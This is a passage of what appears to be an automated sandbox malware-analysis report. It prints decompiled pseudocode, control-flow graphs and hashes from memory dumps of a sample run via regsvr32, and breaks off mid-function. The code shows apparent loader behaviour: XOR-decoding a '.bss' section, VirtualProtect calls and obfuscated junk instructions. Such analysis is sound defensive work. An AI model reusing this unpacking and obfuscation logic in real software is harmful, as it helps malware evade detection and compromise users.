                                0x00731bfc
                                0x00731c01
                                0x00731c15
                                0x00731c1f
                                0x00731c28
                                0x00731c2b
                                0x00731c2e
                                0x00731c31
                                0x00731c36
                                0x00731c3b
                                0x00731c41
                                0x00731c45
                                0x00731c45
                                0x00731c4a
                                0x00731c53
                                0x00731c5b
                                0x00731c5d
                                0x00731c5d
                                0x00731c61
                                0x00731c61
                                0x00731c63
                                0x00731c67
                                0x00731c6d
                                0x00731c73
                                0x00731c75
                                0x00731c79
                                0x00731c7c
                                0x00731c80
                                0x00731c94
                                0x00731c94
                                0x00731c82
                                0x00731c82
                                0x00731c87
                                0x00731c8a
                                0x00731c8e
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00731c8e
                                0x00731c92
                                0x00000000
                                0x00000000
                                0x00731c92
                                0x00731c9a
                                0x00731cac
                                0x00731cac
                                0x00731caf
                                0x00731cb6
                                0x00731cbb
                                0x00731cc1
                                0x00000000
                                0x00731cc3
                                0x00731cc8
                                0x00731ccc
                                0x00731cd3
                                0x00731cd3
                                0x00731cc1
                                0x00731cf4
                                0x00731cfc
                                0x00731d07
                                0x00731d07
                                0x00731d0c
                                0x00731ed1
                                0x00731d12
                                0x00731d12
                                0x00731d17
                                0x00731d1a
                                0x00731d1d
                                0x00731d22
                                0x00731d27
                                0x00731d2a
                                0x00731d2f
                                0x00731d2f
                                0x00731d37
                                0x00731d3c
                                0x00731d40
                                0x00731d45
                                0x00731d49
                                0x00731d4f
                                0x00731d62
                                0x00731d67
                                0x00731d6f
                                0x00731d75
                                0x00731d75
                                0x00731d77
                                0x00731d7e
                                0x00731d8c
                                0x00731d80
                                0x00731d82
                                0x00731d87
                                0x00731d87
                                0x00731d9d
                                0x00731da5
                                0x00731dab
                                0x00731dab
                                0x00731db0
                                0x00731dc1
                                0x00731dc9
                                0x00731dd5
                                0x00731dcb
                                0x00731dd0
                                0x00731dd0
                                0x00731de3
                                0x00731deb
                                0x00731df7
                                0x00731ded
                                0x00731df2
                                0x00731df2
                                0x00731dfa
                                0x00731e02
                                0x00731e07
                                0x00731e0d
                                0x00731e16
                                0x00731e16
                                0x00731e1f
                                0x00731e26
                                0x00731e52
                                0x00731e5e
                                0x00731e67
                                0x00731e6c
                                0x00731e70
                                0x00731e75
                                0x00731e7c
                                0x00731e81
                                0x00731e83
                                0x00731e83
                                0x00731e8d
                                0x00731e8d
                                0x00731e9b
                                0x00731e9b
                                0x00731eab
                                0x00731ebb
                                0x00731ebb
                                0x00731ec9
                                0x00731ec9
                                0x00731eef

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: FreeHeap$ErrorLast
                                • String ID: uJ$uJ
                                • API String ID: 2332451156-3171342107
                                • Opcode ID: 7d8230a046c4e347e58ee4c4be8fc8a96b4e0ab99a4e879f048771c8d09b0c9e
                                • Instruction ID: 88140dc4fb78379bb66918ca7f2eef434e4d407e9adf5c65b18b8dbe136aaab6
                                • Opcode Fuzzy Hash: 7d8230a046c4e347e58ee4c4be8fc8a96b4e0ab99a4e879f048771c8d09b0c9e
                                • Instruction Fuzzy Hash: 0C71A026708BC486EB20DF66E45436EA7A2FBC9B84F988835DE8E47716DE3CC4458710
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00734DB4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 392 734db4-734def HeapCreate 393 734f03-734f23 392->393 394 734df5-734e0b 392->394 395 734e11-734e16 394->395 396 734e94 394->396 397 734e22-734e24 395->397 398 734e18-734e20 395->398 399 734e99-734e9b 396->399 397->396 400 734e26-734e49 HeapAlloc 397->400 398->395 398->397 401 734ea8-734ecf HeapAlloc 399->401 402 734e9d-734ea6 HeapDestroy 399->402 405 734e4b-734e8b call 73111c call 7316fc 400->405 406 734e8d-734e92 400->406 403 734ee1-734efc call 73487a call 7337e0 401->403 404 734ed1-734edf HeapDestroy 401->404 402->393 413 734f01 403->413 404->393 405->399 406->399 413->393
                                C-Code - Quality: 53%
                                			E00734DB4(long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r9, void* __r10, void* __r11) {
				intOrPtr _t23;
				void* _t25;
				void* _t31;
				intOrPtr _t40;
				long long _t48;
				long long _t51;
				void* _t63;
				intOrPtr* _t67;
				void* _t68;
				long long _t70;
				long long _t72;
				void* _t73;
				long long _t75;
				void* _t81;
				void* _t82;
				void* _t83;
				long _t84;
				long _t86;
				long _t88;
				long long _t90;

				_t83 = __r11;
				_t82 = __r10;
				_t81 = __r9;
				_t49 = __rbx;
				_t48 = _t75;
				 *((long long*)(_t48 + 8)) = __rbx;
				 *((long long*)(_t48 + 0x10)) = _t72;
				 *((long long*)(_t48 + 0x18)) = __rsi;
				 *((long long*)(_t48 + 0x20)) = __rdi;
				_t73 = __rcx;
				r8d = 0;
				_t31 = 8; // executed
				HeapCreate(_t88, _t86, _t84); // executed
				_t70 = _t48;
				if(_t48 == 0) {
					L14:
					return _t31;
				}
				_t63 =  *((intOrPtr*)(__rcx + 0x3c)) + __rcx;
				_t67 = _t48 + _t63 + 0x68;
				_t23 =  *_t67;
				if(_t23 == 0) {
					L8:
					_t31 = 2;
					L9:
					if(_t31 == 0) {
						_t40 =  *0x73d450;
						_t68 = _t67 + 0x128ab5c4;
						HeapAlloc(??, ??, ??);
						_t51 = _t48;
						if(_t48 != 0) {
							E0073487A();
							 *((long long*)(_t51 + 8)) = _t70;
							 *0x73d458 = _t51; // executed
							_t25 = E007337E0(0, 0, _t40, _t48, _t73, _t68, _t81, _t82); // executed
							_t31 = _t25;
						} else {
							HeapDestroy();
							_t31 = 8;
						}
					} else {
						HeapDestroy();
					}
					goto L14;
				}
				while(_t23 != 0x7373622e) {
					_t67 = _t67 + 0x28;
					_t23 =  *_t67;
					if(_t23 != 0) {
						continue;
					}
					break;
				}
				if(_t23 == 0) {
					goto L8;
				} else {
					r13d =  *(_t67 + 0x10);
					r12d =  *(_t67 + 0x14);
					r12d = r12d ^  *(_t63 + 8);
					r12d = r12d ^ r13d;
					HeapAlloc(??, ??, ??);
					_t90 = _t48;
					if(_t48 == 0) {
						_t31 = 8;
					} else {
						r9d = r12d;
						r8d = r13d;
						E0073111C(_t49, _t48, _t63 + _t73);
						r11d =  *((intOrPtr*)(_t67 + 0xc));
						_t48 = 0x741040;
						 *0x73d448 = _t90 - _t83 - _t73;
						 *0x73d450 = E007316FC(_t90 - _t83 - _t73 + 0x741040);
					}
					goto L9;
				}
			}























                                0x00734db4
                                0x00734db4
                                0x00734db4
                                0x00734db4
                                0x00734db4
                                0x00734db7
                                0x00734dbb
                                0x00734dbf
                                0x00734dc3
                                0x00734dd1
                                0x00734dd4
                                0x00734dde
                                0x00734de3
                                0x00734de9
                                0x00734def
                                0x00734f03
                                0x00734f23
                                0x00734f23
                                0x00734dfb
                                0x00734e02
                                0x00734e07
                                0x00734e0b
                                0x00734e94
                                0x00734e94
                                0x00734e99
                                0x00734e9b
                                0x00734ea8
                                0x00734eba
                                0x00734ec3
                                0x00734ec9
                                0x00734ecf
                                0x00734ee9
                                0x00734eee
                                0x00734ef5
                                0x00734efc
                                0x00734f01
                                0x00734ed1
                                0x00734ed4
                                0x00734eda
                                0x00734eda
                                0x00734e9d
                                0x00734ea0
                                0x00734ea0
                                0x00000000
                                0x00734e9b
                                0x00734e11
                                0x00734e18
                                0x00734e1c
                                0x00734e20
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00734e20
                                0x00734e24
                                0x00000000
                                0x00734e26
                                0x00734e26
                                0x00734e2a
                                0x00734e31
                                0x00734e3a
                                0x00734e3d
                                0x00734e43
                                0x00734e49
                                0x00734e8d
                                0x00734e4b
                                0x00734e4e
                                0x00734e51
                                0x00734e5a
                                0x00734e5f
                                0x00734e63
                                0x00734e75
                                0x00734e85
                                0x00734e85
                                0x00000000
                                0x00734e49

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: Heap$AllocDestroy$Create
                                • String ID: .bss
                                • API String ID: 388876957-3890483948
                                • Opcode ID: f2c7b615a138f4c90b95f00cc2a562d4e42a46c6d73442d59f831ff1248fe2d1
                                • Instruction ID: 199c13762ca88663afdc7a06dea7328f5ce92628d8e03969e136d497687aa5d8
                                • Opcode Fuzzy Hash: f2c7b615a138f4c90b95f00cc2a562d4e42a46c6d73442d59f831ff1248fe2d1
                                • Instruction Fuzzy Hash: 8E318C66B0478186FB18CF66A98431A77A1F788FD4F188025DE4947B56EF3CF995C700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F7C20 Relevance: 7.7, APIs: 5, Instructions: 219memoryfileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 35%
                                			E00007FFC7FFC130F7C20(long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r8, signed long long __r9) {
				void* __rdi;
				signed int _t122;
				void* _t126;
				signed int _t130;
				void* _t131;
				signed int _t132;
				void* _t137;
				void* _t146;
				intOrPtr _t149;
				signed long long _t168;
				void* _t191;
				intOrPtr _t212;
				intOrPtr _t222;
				void* _t223;
				signed long long _t226;
				void* _t231;
				signed long long _t232;
				long long _t235;
				signed int _t238;
				void* _t240;
				void* _t241;
				signed long long _t245;
				intOrPtr* _t251;
				signed long long _t253;
				signed int _t254;
				void* _t255;
				long _t257;
				void* _t259;
				long _t261;
				void* _t263;

				_t255 = _t240;
				 *((long long*)(_t255 + 8)) = __rbx;
				 *((long long*)(_t255 + 0x10)) = _t235;
				 *((long long*)(_t255 + 0x18)) = __rsi;
				_t241 = _t240 - 0x60;
				_t212 =  *((intOrPtr*)(_t241 + 0xb0));
				r14d = __rcx - 0x2103;
				r12d = __r8 + 0xd1;
				r15d =  *(_t241 + 0xd8);
				_t231 =  *(_t241 + 0xd0) + 0xfffff9ee;
				r15d = r15d + 0x1249;
				r13d = _t212 - 0x27b2;
				r8d = r8d + 0x152;
				if (_t212 + 0xeb4 - _t146 < 0) goto 0x130f7f40;
				if (r14d == _t131) goto 0x130f7f24;
				if ( *((long long*)(__r9 + 0x2f8)) == 0) goto 0x130f7e1e;
				 *((intOrPtr*)( *((intOrPtr*)(__r9)) + 0x198)) =  *((intOrPtr*)( *((intOrPtr*)(__r9)) + 0x198)) +  *(__r9 + 0x90) - 0x3a59;
				_t149 =  *((intOrPtr*)(__r9));
				 *((long long*)(__r9 + 0x48)) = 0x84ef49a;
				r8d =  *(_t149 + 0x130);
				r8d = r8d ^ 0x000023f3; // executed
				VirtualProtect(_t263, _t261);
				if (_t149 != 0) goto 0x130f7d2b;
				_t191 =  *((intOrPtr*)( *((intOrPtr*)(__r9)) + 0x188)) + 0x259;
				_t137 = _t191 - 0x3595;
				if (_t137 < 0) goto 0x130f7d2b;
				 *(__r9 + 0x90) =  *(__r9 + 0x90) ^ __r9 + 0x000001c0;
				_t238 =  *((intOrPtr*)(__r9 + 0x2f8)) +  *0x7FFBD54B40A3;
				if (_t137 <= 0) goto 0x130f7d6a;
				_t245 =  *(__r9 + 0x228) ^ 0x00001f2c;
				 *(__r9 + 0x120) = _t245;
				if (_t126 - _t191 < 0) goto 0x130f7d51;
				_t251 = _t241 + 0xd0;
				 *((intOrPtr*)( *((intOrPtr*)(__r9)) + 0x198)) =  *((intOrPtr*)( *((intOrPtr*)(__r9)) + 0x198)) +  *((intOrPtr*)(__r9 + 0x70)) + 0x2032;
				 *((long long*)(_t238 + 8)) =  *((intOrPtr*)(__r9 + 0xc0));
				 *((long long*)(_t238 + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x118)) + 0x50));
				 *((long long*)(__r9 + 0x28)) = __r9 + 0x1b0;
				r8d =  *( *((intOrPtr*)(__r9 + 0x118)) + 0x88 +  *( *((intOrPtr*)(__r9)) + 0x130) * 0x3ffaa955 * 8);
				 *_t238 = _t245 +  *((intOrPtr*)(__r9 + 0xc0));
				 *((long long*)(__r9 + 0xa0)) = 0x6dce;
				 *((long long*)(_t238 + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x118)) + 0xa4));
				 *( *((intOrPtr*)(__r9 + 0x140)) + 0x198) =  *( *((intOrPtr*)(__r9 + 0x140)) + 0x198) |  *(__r9 + 0x198) + 0x0000329d;
				r8d =  *(_t241 + 0xd0);
				VirtualProtect(_t259, _t257);
				if (_t231 -  *((intOrPtr*)(_t241 + 0xc0)) + 0x10a3 < 0) goto 0x130f803b;
				r14d = r14d + 0x30d5;
				 *((long long*)(__r9 + 0x158)) =  *((intOrPtr*)(__r9 + 0x88));
				 *((long long*)(__r9 + 0x298)) =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0xd0)) + 0x28)) +  *((intOrPtr*)(__r9 + 0xc0));
				 *((long long*)(__r9 + 0x10)) = 0x2598;
				 *(__r9 + 0x198) =  *(__r9 + 0x198) * 0xed7e2e8;
				_t226 =  *((intOrPtr*)(__r9 + 0x158));
				if (_t226 == 0) goto 0x130f7eac;
				_t168 =  *(__r9 + 0x1e0) | 0x0000228c;
				 *(__r9 + 0x198) = _t168;
				GetProcessHeap();
				if (_t168 == 0) goto 0x130f7eac;
				HeapFree(??, ??, ??); // executed
				r8d =  *(_t241 + 0xd8);
				 *(_t241 + 0x50) = _t168;
				r10d = _t259 + 0x2032;
				 *(_t241 + 0x48) = r10d;
				r11d = _t257 - 0x1563;
				 *((intOrPtr*)(_t241 + 0x40)) = r11d;
				 *(_t241 + 0x38) = _t226;
				_t132 = _t261 - 0xb3d;
				_t232 = _t231 + 0x1c8;
				r9d = _t261 + 0x612;
				 *(_t241 + 0x30) = _t232;
				 *(_t241 + 0x28) = __r9;
				r8d = r8d + 0x216;
				 *(_t241 + 0x20) = _t238;
				E00007FFC7FFC130E82D0(0, _t226, _t226); // executed
				goto 0x130f803b;
				goto 0x130f803b;
				_t254 = _t130;
				if (_t254 - (( *(_t251 + 0xd8) | r15d) ^ _t132) >= 0) goto 0x130f7ffe;
				if (_t254 -  *((intOrPtr*)(_t251 + 0x110)) +  *_t251 >= 0) goto 0x130f7fe6;
				SetEndOfFile(_t223);
				r9d =  *(__r9 + 0xc8);
				r10d =  *(__r9 + 0xf0);
				r9d = r9d & _t132;
				r10d = r10d ^  *(__r9 + 0x90);
				r9d = r9d ^ 0x00003666;
				_t222 =  *((intOrPtr*)(__r9 + 0x130));
				 *(_t241 + 0x38) = r9d;
				r13d = r13d | _t130;
				 *(_t241 + 0x30) = _t226 & 0x000027b2;
				r10d = r10d - 0x3a59;
				 *(_t241 + 0x28) = _t232 & 0x00000008 | 0x000023f6;
				 *(_t241 + 0x20) = r10d;
				r8d = r13d;
				_t122 = E00007FFC7FFC130E8BF0(_t261 - 0xcdf, _t261 + 0xb4 + r14d, _t232 & 0x00000008 | 0x000023f6, __r9, (_t232 & 0x000027b2) +  *(__r9 + 0x120), _t222, _t226, __r9, _t255);
				r14d = _t122;
				goto 0x130f803b;
				 *(__r9 + 0x100) =  *(__r9 + 0x100) |  *((intOrPtr*)(__r9 + 0x188)) +  *((intOrPtr*)(__r9 + 0x78)) +  *((intOrPtr*)(__r9 + 0x70));
				goto 0x130f803b;
				_t253 =  *((intOrPtr*)(__r9 + 0x1f0));
				if (_t254 == r8d * _t253 - _t222) goto 0x130f803b;
				r8d = r8d * _t122;
				if (_t130 != r8d * _t253 - _t222) goto 0x130f8020;
				return _t261 - 0xfd2;
			}

































                                0x7ffc130f7c20
                                0x7ffc130f7c23
                                0x7ffc130f7c27
                                0x7ffc130f7c2b
                                0x7ffc130f7c38
                                0x7ffc130f7c3c
                                0x7ffc130f7c43
                                0x7ffc130f7c51
                                0x7ffc130f7c58
                                0x7ffc130f7c6e
                                0x7ffc130f7c7a
                                0x7ffc130f7c87
                                0x7ffc130f7c8e
                                0x7ffc130f7c9a
                                0x7ffc130f7ca3
                                0x7ffc130f7cb1
                                0x7ffc130f7cc7
                                0x7ffc130f7cd5
                                0x7ffc130f7cdb
                                0x7ffc130f7cee
                                0x7ffc130f7cf5
                                0x7ffc130f7cfc
                                0x7ffc130f7d04
                                0x7ffc130f7d0f
                                0x7ffc130f7d15
                                0x7ffc130f7d1b
                                0x7ffc130f7d24
                                0x7ffc130f7d3b
                                0x7ffc130f7d41
                                0x7ffc130f7d4a
                                0x7ffc130f7d53
                                0x7ffc130f7d68
                                0x7ffc130f7d6d
                                0x7ffc130f7d7f
                                0x7ffc130f7d8d
                                0x7ffc130f7da2
                                0x7ffc130f7da5
                                0x7ffc130f7dbd
                                0x7ffc130f7dcf
                                0x7ffc130f7dd3
                                0x7ffc130f7deb
                                0x7ffc130f7e02
                                0x7ffc130f7e09
                                0x7ffc130f7e18
                                0x7ffc130f7e26
                                0x7ffc130f7e33
                                0x7ffc130f7e4b
                                0x7ffc130f7e52
                                0x7ffc130f7e64
                                0x7ffc130f7e6c
                                0x7ffc130f7e73
                                0x7ffc130f7e7d
                                0x7ffc130f7e86
                                0x7ffc130f7e8c
                                0x7ffc130f7e93
                                0x7ffc130f7e9c
                                0x7ffc130f7ea6
                                0x7ffc130f7eac
                                0x7ffc130f7ebc
                                0x7ffc130f7ec0
                                0x7ffc130f7ec7
                                0x7ffc130f7ecc
                                0x7ffc130f7ed4
                                0x7ffc130f7ee0
                                0x7ffc130f7ee4
                                0x7ffc130f7eeb
                                0x7ffc130f7ef1
                                0x7ffc130f7ef8
                                0x7ffc130f7f03
                                0x7ffc130f7f0f
                                0x7ffc130f7f16
                                0x7ffc130f7f1a
                                0x7ffc130f7f1f
                                0x7ffc130f7f3b
                                0x7ffc130f7f53
                                0x7ffc130f7f59
                                0x7ffc130f7f6c
                                0x7ffc130f7f6e
                                0x7ffc130f7f74
                                0x7ffc130f7f7d
                                0x7ffc130f7f84
                                0x7ffc130f7f87
                                0x7ffc130f7f8e
                                0x7ffc130f7f95
                                0x7ffc130f7f9d
                                0x7ffc130f7fbc
                                0x7ffc130f7fbf
                                0x7ffc130f7fc3
                                0x7ffc130f7fca
                                0x7ffc130f7fd1
                                0x7ffc130f7fd9
                                0x7ffc130f7fdc
                                0x7ffc130f7fe1
                                0x7ffc130f7fe4
                                0x7ffc130f7ff5
                                0x7ffc130f7ffc
                                0x7ffc130f7ffe
                                0x7ffc130f8012
                                0x7ffc130f8025
                                0x7ffc130f8039
                                0x7ffc130f805f

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: ProtectVirtual$FileHeapPrivilegeProcessRelease
                                • String ID:
                                • API String ID: 1146652191-0
                                • Opcode ID: f8c4942e56d1cc675816b14a356dfaf46b24f5be3101768ff6fcfd4b9866806c
                                • Instruction ID: 9953ac6f7de0af428f2d765eb6b5b05fb97ad360630c624243fc19e29c606389
                                • Opcode Fuzzy Hash: f8c4942e56d1cc675816b14a356dfaf46b24f5be3101768ff6fcfd4b9866806c
                                • Instruction Fuzzy Hash: 65B18672605B998BDB90CF25D894BE937A8F788B98F054036CE4D5B358DF38D661CB10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130FA4A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 128memoryfileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 86%
                                			E00007FFC7FFC130FA4A0(void* __rax, void* __rcx, void* __rdx, void* __r9, intOrPtr _a16, intOrPtr _a80, intOrPtr _a88, intOrPtr _a96, long long _a104, long long _a120) {
				long long _v96;
				short _v104;
				signed char _t44;
				void* _t45;
				signed int _t46;
				short _t47;
				intOrPtr* _t54;
				intOrPtr _t62;
				intOrPtr _t64;
				void* _t80;
				intOrPtr _t82;

				_t64 = _a96;
				r8d = r8d + 4;
				_a104 = _a104 + 0xfffffdb4;
				r9d = _t64 - 0x30d5;
				_a96 = r8d;
				_a16 = r9d;
				_a120 = _a80 + 0xffffda68;
				if (_a120 + 0x18b7 - __rax > 0) goto 0x130fa608;
				_t54 = __rdx - 0xea2;
				if (_t54 - _t64 + 0xffffee57 <= 0) goto 0x130fa5fa;
				_v96 = 0x38e9;
				r9d = 0x3666;
				_v104 = _t47;
				r8d = 0x37e1;
				 *((long long*)(_t54 - 0x77)) =  *((long long*)(_t54 - 0x77)) - 1;
				 *((intOrPtr*)(_t54 - 0x75)) =  *((intOrPtr*)(_t54 - 0x75)) + _t45;
				 *((intOrPtr*)(_t54 - 0x7f)) =  *((intOrPtr*)(_t54 - 0x7f)) + _t45;
				asm("int1");
				spl = spl ^  *(_t80 - 0x76b80000);
				_t62 =  *((intOrPtr*)(_t54 + 1));
				 *_t54 =  *_t54 + __r9 + 0x38e9;
				_t82 =  *((intOrPtr*)(_t62 + 0x1a0));
				_t44 =  *(_t82 + 0xb0) * 0x4b917808;
				if (_t54 == 0x2598) goto 0x130fa5bc;
				 *(_t62 + 0x1b0) =  *(_t62 + 0x1b0) |  *( *((intOrPtr*)(_t62 + 0x1c0)) + 0x120) ^ 0x00002032;
				_t46 =  *(_t82 + 0xb0) * 0x4b917808;
				if (_t47 != 0x1f2c) goto 0x130fa590;
				 *0xFEF573E841001F5D =  *((intOrPtr*)(0x1f2c +  *((intOrPtr*)(_a88 + 0x13088)) + 0x41000031)) - _t46;
				 *0x244489660000361E =  *0x244489660000361E & _t44;
				asm("loope 0x39");
				 *0x30d5 =  *0x30d5 + _t44;
				 *0x2444C7480000305E =  *((long long*)(0x2444c7480000305e)) - 1;
				asm("adc dword [eax+0x3], 0x0");
				 *0x2444C74800003056 =  *((intOrPtr*)(0x2444c74800003056)) + _t46;
				 *0x30d5 =  *0x30d5 & 0x00000001;
				 *0x30d5 =  *0x30d5 + _t44;
				asm("invalid");
				return _t44;
			}














                                0x7ffc130fa4a8
                                0x7ffc130fa4af
                                0x7ffc130fa4c7
                                0x7ffc130fa4d8
                                0x7ffc130fa4df
                                0x7ffc130fa4ee
                                0x7ffc130fa4f6
                                0x7ffc130fa4ff
                                0x7ffc130fa50b
                                0x7ffc130fa513
                                0x7ffc130fa52a
                                0x7ffc130fa532
                                0x7ffc130fa538
                                0x7ffc130fa53d
                                0x7ffc130fa54c
                                0x7ffc130fa553
                                0x7ffc130fa55c
                                0x7ffc130fa55f
                                0x7ffc130fa560
                                0x7ffc130fa566
                                0x7ffc130fa569
                                0x7ffc130fa56b
                                0x7ffc130fa572
                                0x7ffc130fa57f
                                0x7ffc130fa5a5
                                0x7ffc130fa5ac
                                0x7ffc130fa5ba
                                0x7ffc130fa5c5
                                0x7ffc130fa5d4
                                0x7ffc130fa5d7
                                0x7ffc130fa5d9
                                0x7ffc130fa5e7
                                0x7ffc130fa5ea
                                0x7ffc130fa5ee
                                0x7ffc130fa5f1
                                0x7ffc130fa5f4
                                0x7ffc130fa5f8
                                0x7ffc130fa607

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: CreateCriticalFileHeapLeaveLockSection
                                • String ID: 8
                                • API String ID: 4149557297-406019892
                                • Opcode ID: 6afc501cdda84a8fadb91fbbbb11c393d55ba66f7b0e10c663e9cbf60baa1dbc
                                • Instruction ID: 5fe38b4b8d1eaab9386d1c2296811315ce8ec8f632313b3aa5417c44abe94267
                                • Opcode Fuzzy Hash: 6afc501cdda84a8fadb91fbbbb11c393d55ba66f7b0e10c663e9cbf60baa1dbc
                                • Instruction Fuzzy Hash: 19616D736086D48BD362CF15E544BDEB7A8FB88794F154139EB8957798CB38D990CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0073A238 Relevance: 6.4, APIs: 5, Instructions: 127memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 457 73a238-73a278 call 7324b0 460 73a27e-73a290 call 73908c 457->460 461 73a3dc-73a3f5 457->461 464 73a292-73a29d 460->464 465 73a29f-73a2a1 460->465 466 73a2a5-73a2c7 HeapAlloc 464->466 465->466 467 73a3ce-73a3d6 HeapFree 466->467 468 73a2cd-73a304 call 7347b0 * 2 call 73908c 466->468 467->461 476 73a306-73a30b 468->476 477 73a30d 468->477 478 73a30f-73a32a call 737cf4 476->478 477->478 481 73a32f-73a341 HeapFree 478->481 481->467 482 73a347-73a378 call 7352b8 481->482 485 73a37a-73a381 482->485 486 73a389-73a391 482->486 485->486 487 73a383-73a387 485->487 488 73a393-73a39e call 737500 486->488 489 73a3b0-73a3c8 HeapFree * 2 486->489 487->485 487->486 492 73a3a0-73a3a3 488->492 493 73a3a5-73a3ad 488->493 489->467 492->489 493->489
                                C-Code - Quality: 24%
                                			E0073A238(void* __ecx, void* __ebp, void* __eflags, long long __rbx, void* __rcx, void* __rdx, long long __r8, void* __r9, void* _a8, long long* _a24, char _a32) {
				char _v72;
				char _v80;
				char _v88;
				long long _v104;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				intOrPtr _t40;
				void* _t41;
				void* _t43;
				void* _t49;
				char _t50;
				intOrPtr _t60;
				long long* _t77;
				long long _t78;
				long long _t79;
				void* _t91;
				intOrPtr _t103;
				void* _t104;
				intOrPtr _t106;
				void* _t107;
				long long* _t109;
				intOrPtr _t111;
				long long* _t113;
				long long* _t119;
				void* _t129;

				_t79 = __rbx;
				_t77 = _t113;
				 *((long long*)(_t77 + 8)) = __rbx;
				 *((long long*)(_t77 + 0x18)) = __r8;
				_push(_t107);
				_push(_t104);
				_t126 =  *0x73d458;
				_t3 = _t77 + 0x20; // 0xfb849fa7
				_t111 =  *((intOrPtr*)( *0x73d458 + 8));
				_t129 = __rcx;
				_t49 = 8; // executed
				E007324B0(8, __ecx, __eflags, __rbx, _t3, _t107); // executed
				if(_t77 == 0) {
					L18:
					return _t49;
				}
				E0073908C(0xfb849f8f, _t77,  *((intOrPtr*)(_t126 + 0x18)));
				if(_t77 == 0) {
					__eflags = 0;
					_v88 = 0;
				} else {
					_v88 =  *_t77();
				}
				_t10 = _t77 + 1; // 0x1
				r8d = _t104 + _t10;
				HeapAlloc(??, ??, ??);
				_t109 = _t77;
				_v80 = _t77;
				if(_t77 == 0) {
					L17:
					HeapFree();
					goto L18;
				} else {
					_t50 = _a32;
					L007347B0();
					_t13 = _t104 + 1; // 0x1
					r8d = _t13;
					L007347B0();
					E0073908C(0xfb849f8f, _t77,  *((intOrPtr*)(_t126 + 0x18)));
					if(_t77 == 0) {
						_t40 = 0;
						__eflags = 0;
					} else {
						_t40 =  *_t77();
					}
					_t16 =  &_a32; // 0xfb84a007
					_t17 =  &_v72; // 0xfb849f9f
					r8d = _t40;
					_v104 = _t16;
					_t41 = E00737CF4(_t50, _t77, _t79, _t129, _t109, _t111, _t17); // executed
					_t119 = _t109;
					_t49 = _t41;
					HeapFree(??, ??, ??);
					if(_t49 != 0) {
						goto L17;
					} else {
						r8d = _a32;
						_t103 = _v72;
						_t21 =  &_v88; // 0xfb849f8f
						_t78 = _t21;
						_t22 =  &_v80; // 0xfb849f87
						_t91 = _t129;
						_v104 = _t78;
						_t43 = E007352B8(_t79, _t103, _t109, _t111, _t119, _t22);
						_t52 = _v88;
						_t106 = _v80;
						_t49 = _t43;
						if(_v88 == 0) {
							L12:
							 *((char*)(_t78 + _t106)) = 0;
							if(_t49 == 0) {
								E00737500(_t49, _t52, _t79, _t106, _t103, _t106, _t109, _t111);
								if(_t78 != 0) {
									 *_a24 = _t78;
								} else {
									_t29 = _t78 + 8; // 0x8
									_t49 = _t29;
								}
							}
							HeapFree();
							HeapFree(??, ??, ??);
							goto L17;
						} else {
							goto L10;
						}
						while(1) {
							L10:
